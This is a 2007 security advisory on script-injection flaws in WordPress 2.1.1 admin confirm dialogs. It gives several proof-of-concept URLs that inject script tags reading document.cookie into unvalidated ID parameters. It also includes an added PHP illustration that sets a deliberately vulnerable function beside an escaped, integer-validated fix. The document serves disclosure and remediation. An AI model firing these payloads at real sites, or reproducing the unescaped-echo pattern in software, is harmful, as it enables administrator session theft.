[UNIX] WordPress Multiple Script Injection Vulnerabilities



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



WordPress Multiple Script Injection Vulnerabilities
------------------------------------------------------------------------


SUMMARY

"WordPress <http://www.wordpress.org> is a state-of-the-art semantic
personal publishing platform with a focus on aesthetics, web standards,
and usability." Multiple script injection vulnerabilities have been
discovered in WordPress. They allow remote attackers to insert arbitrary
HTML and/or JavaScript into the administration pages returned to the client
(cross-site scripting against a logged-in administrator).

DETAILS

Vulnerable Systems:
* WordPress version 2.1.1

Stefan Friedli found several vulnerabilities based on an advisory entitled
"WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender", which described a
lack of input validation when deleting posts that allows injection of
arbitrary code. That vulnerability was reported on February 26th and is
referenced under Sources below.

Beyond that vulnerability, which was limited to manipulating the
"post" parameter, there are several other vulnerabilities that are very
similar to the one mentioned above. Every operation that makes use of the
common confirm dialog is vulnerable to this type of attack: the value of the
ID parameter is echoed unescaped into the confirmation page, so a `'>` in the
value closes the HTML attribute and the rest of the payload is rendered as
markup.

Possible injection...

.. when deleting posts as mentioned in Samenspenders advisory
(unvalidated parameter: post, file: post.php)
http://target.tld/wp-admin/post.php?action=delete
&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39
&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting pages (unvalidated parameter: page, file: page.php)
http://target.tld/wp-admin/page.php?action=delete
&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting categories (unvalidated parameter: cat_ID, file:
categories.php)
http://target.tld/wp-admin/categories.php?action=delete
&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.. when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment
&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
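The following is an added illustration, not code from the advisory or from WordPress itself: a stand-in for the confirm dialog behind wp-admin/post.php?action=delete, showing why the PoC URLs above work and what the fix looks like. The request array, the markup and the function names are constructed for the example; the real files differ in layout and wording.

```php
<?php
// Added illustration (not WordPress code): a stand-in for the delete
// confirmation page and the two controls that close the hole.

// Constructed request, equivalent to the advisory's PoC URL for post.php:
//   post.php?action=delete&post='><script>alert(document.cookie)</script>
$constructed_get = array(
    'action' => 'delete',
    'post'   => "'><script>alert(document.cookie)</script>",
);

// Vulnerable pattern: the unvalidated parameter is echoed straight into a
// single-quoted attribute of the confirmation form. The payload's leading '>
// closes the <input> tag, and the <script> that follows runs in the
// authenticated administrator's browser session.
function vulnerable_confirm_dialog(array $get)
{
    $post = isset($get['post']) ? $get['post'] : '';
    return "<form method='post' action='post.php?action=delete'>\n"
         . "<input type='hidden' name='post' value='" . $post . "' />\n"
         . "<p>Really delete post " . $post . "?</p>\n"
         . "<input type='submit' value='Yes' />\n"
         . "</form>\n";
}

// Hardened form. Two independent controls:
//  1. Validate by type: a post ID is an integer, so cast it; anything that is
//     not a positive integer is refused before any HTML is built.
//  2. Escape on output: every value placed into HTML goes through
//     htmlspecialchars() with ENT_QUOTES, so '><script> cannot leave the
//     attribute even if the ID check is missing elsewhere. (WordPress core
//     provides a wrapper for this escaping; esc_attr() in current releases.)
// The CSRF side of the original report additionally needs a per-action
// anti-CSRF token in the form, which is outside this illustration.
function hardened_confirm_dialog(array $get)
{
    $post = isset($get['post']) ? (int) $get['post'] : 0;
    if ($post <= 0) {
        return null; // caller should respond 400 / "invalid post id"
    }
    $safe = htmlspecialchars((string) $post, ENT_QUOTES, 'UTF-8');
    return "<form method='post' action='post.php?action=delete'>\n"
         . "<input type='hidden' name='post' value='" . $safe . "' />\n"
         . "<p>Really delete post " . $safe . "?</p>\n"
         . "<input type='submit' value='Yes' />\n"
         . "</form>\n";
}

// Demonstration: the vulnerable page carries a live <script> element; the
// hardened page refuses the malformed ID and renders a clean form for a real one.
$vuln = vulnerable_confirm_dialog($constructed_get);
echo (strpos($vuln, '<script>') !== false)
    ? "VULNERABLE: script tag reached the page\n"
    : "no script tag in page\n";

var_dump(hardened_confirm_dialog($constructed_get)); // rejected, returns NULL
echo hardened_confirm_dialog(array('post' => '39'));  // clean form for post 39

// Escaping alone is enough to neutralise the payload. The same treatment
// applies to the "c", "p" and "cat_ID" parameters of comment.php and
// categories.php listed in the advisory, which carry integer IDs as well.
echo htmlspecialchars($constructed_get['post'], ENT_QUOTES, 'UTF-8') . "\n";
```

Run with `php example.php`. The point of the two-layer fix is the one the Impact section makes: validating only the "post" parameter leaves every other confirm-dialog parameter exposed, so the escaping has to sit at the output point shared by all of them, with the integer cast as defence in depth.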

Impact:
This list may not be exhaustive. It illustrates that the flaw in the
confirmation dialogs in WordPress is not limited to the "Delete
Post" function. Fixing the validation of the post parameter alone, as
suggested by e.g. Secunia, does not fix the problem and does not reduce the
threat of cross-site scripting or any other web-based exploitation, since
the other confirm-dialog parameters remain unescaped.

Temporary Solution:
Until these issues are patched, possible workarounds are manual fixing
(casting the ID parameters to integers and escaping them on output in the
affected admin scripts) or the use of an application-level filter such as
mod_security for Apache to reject non-numeric values for these parameters.

Sources:
Samenspender - WordPress AdminPanel CSRF/XSS - 0day
http://seclists.org/bugtraq/2007/Feb/0494.html

Disclosure Timeline:
02/26/07 - Release of "Delete Post" confirmation vulnerability
02/27/07 - Identification of further vulnerabilities
02/27/07 - Immediate release for informational purposes


ADDITIONAL INFORMATION

The information has been provided by Stefan Friedli - scip AG.
The original article can be found at:
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962




DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.